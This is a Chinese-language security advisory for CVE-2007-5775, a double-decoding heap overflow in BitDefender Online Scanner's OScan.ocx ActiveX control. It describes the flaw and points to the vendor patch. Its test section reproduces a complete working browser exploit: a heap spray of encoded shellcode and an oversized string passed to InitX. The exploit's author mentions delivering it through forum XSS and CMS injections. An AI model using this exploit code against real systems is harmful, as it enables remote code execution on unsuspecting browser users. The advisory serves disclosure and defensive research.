发布日期：2007-10-25
更新日期：2007-11-21

受影响系统：

Softwin BitDefender Online Scanner 8

描述：

---

BUGTRAQ  ID: 26210
CVE(CAN) ID: CVE-2007-5775

BitDefender Online Scanner是一款免费的在线杀毒软件。

BitDefender在线扫描器所捆绑的OScan.ocx控件中存在远程代码执行漏洞，远程攻击者可能利用此漏洞在用户系统上执行任意指令。

OScan.ocx的有漏洞函数为InitX，该函数取得了bstrLocation的字符串参数值用于确认调用域。InitX的IDL类似于以下：

    Function InitX     {        ByVal bstrLocation as String    } As Boolean

这个功能用于保护ActiveX控件防止从授权域之外初始化。用户可以提交请求向站点上传这个控件，然后获得初始化密钥。用户域是由以下16进制密钥处理的：

    AvxUI.InitX('000000408E45E3394593BF66F0C93C6CF90AF0F0             AB417E17657D7F328A2312ACBE0B139EF3EBFB69             939B1C3B24D8BC392D752B8408EAACCD809B94D3             8B8F9B5E97B1C1A6')

在处理并确认了这个域密钥后才会初始化控件并接受用户命令开始扫描文件，但在处理传送给有漏洞函数域密钥的Unicode值时存在双重解码漏洞。如果向域密钥值附加了两个??（0x25）字符就会触发这个漏洞，导致OScan.ocx双重解码Unicode参数并分配任意内存。结合超长字符串，就可能导致堆内存破坏的情况。这种堆溢出允许使用任意用户畸形字符串的数据覆盖Internet Explorer或主机ActiveX进程中的内存。尽管攻击者无法控制发生内存覆盖的位置，但漏洞仍可能覆盖Internet Explorer或主机ActiveX进程之后调用的指针，因此可能执行任意指令。

<*来源：Greg Linares （glinares.code@gmail.com）
  
  链接：http://secunia.com/advisories/27717/
        http://research.eeye.com/html/advisories/published/AD20071120.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Nphinity提供了如下测试代码：
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-
BitDefender OScan8.ocx / Oscan81.ocx ActiveX Exploit

=-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT
PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=-

http://research.eeye.com/html/advisories/published/AD20071120.htm
l
http://secunia.com/advisories/27717/


This works not 100% - it corrupts random memory in the browser
and Launches calculator with success.

Users have had this installed since 2006! With no autoupdates
:)

Google Search of BD OSCAN =
http://www.google.com/search?hl=ar&safe=off&rls=fr&hs
=P4T&q=%225D86DDB5-BDF9-441B-9E9E-D4730F4EE499%22&btnG=Se
arch

Modify the values in these to help keep it stable:
'SiteAuthority' - different memory address ?? - it turns values
to literal address !
while (SiteAuthority.length < 60000) - Maybe larger/smaller?


Crashes IE even if it fails

Tested with Forum XSS Injections + Wordpress 0day + CMS
Injections

Nphinity
#SAMAH/#SYR/#SHAHADA
mesra.kl.my.dal.net




=-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT
PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=-




<html>


<object classid='clsid:5D86DDB5-BDF9-441B-9E9E-D4730F4EE499'
id='BD'>
</object>

<script language="javascript">


SCPL =
unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474&q
uot; +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");

MemContent = unescape("%u0606");

HSize = 20;

FreeSpace = HSize+SCPL.length

while (MemContent.length<FreeSpace)
{
MemContent+=MemContent;
}

FB = MemContent.substring(0, FreeSpace);

Mem = MemContent.substring(0, MemContent.length-FreeSpace);

while(Mem.length+FreeSpace<0x60000)
{
Mem = Mem+Mem+FB;
}

memory = new Array();

for (x=0;x<600;x++) memory[x] = Mem + SCPL;

var SiteAuthority = '%%';

while (SiteAuthority.length < 60000)
{
SiteAuthority+='\x30\x36\x30\x36';
}

BD.initx(SiteAuthority);

</script>
</html>

建议：

---

厂商补丁：

Softwin
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.bitdefender.com/scan8/ie.html

浏览次数：3661
严重程度：0（网友投票）